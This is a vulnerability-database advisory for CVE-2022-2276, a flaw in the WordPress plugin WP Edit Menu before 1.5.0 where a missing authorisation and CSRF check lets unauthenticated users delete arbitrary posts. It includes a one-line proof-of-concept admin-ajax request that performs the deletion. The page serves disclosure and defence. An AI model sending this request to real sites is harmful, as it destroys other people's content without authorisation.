Lucene search
Johannes GangsรถWPEX-ID:92DE9C1B-48DD-4A5F-BBB3-455F8F172B09HistoryAug 01, 2022 - 12:00 a.m.
WP Edit Menu < 1.5.0 - Unauthenticated Arbitrary Post Deletion
2022-08-0100:00:00
Johannes Gangsรถ
83
wp edit menu
unauthenticated
arbitrary post
deletion
admin-ajax exploit
EPSS
0.001
Percentile
31.6%
The plugin does not have authorisation and CSRF in an AJAX action, which could allow unauthenticated attackers to delete arbitrary posts/pages from the blog
https://example.com/wp-admin/admin-ajax.php?action=filter_menu&val=[post-id]Related
wpvulndb
wpvulndb
WP Edit Menu < 1.5.0 - Unauthenticated Arbitrary Post Deletion
2022-08-01 00:00:00
prion
prion
Cross site request forgery (csrf)
2022-08-22 15:15:00
cvelist
cvelist
CVE-2022-2276 WP Edit Menu < 1.5.0 - Unauthenticated Arbitrary Post Deletion
2022-08-22 15:00:57
nvd
nvd
CVE-2022-2276
2022-08-22 15:15:14
cve
cve
CVE-2022-2276
2022-08-22 15:15:14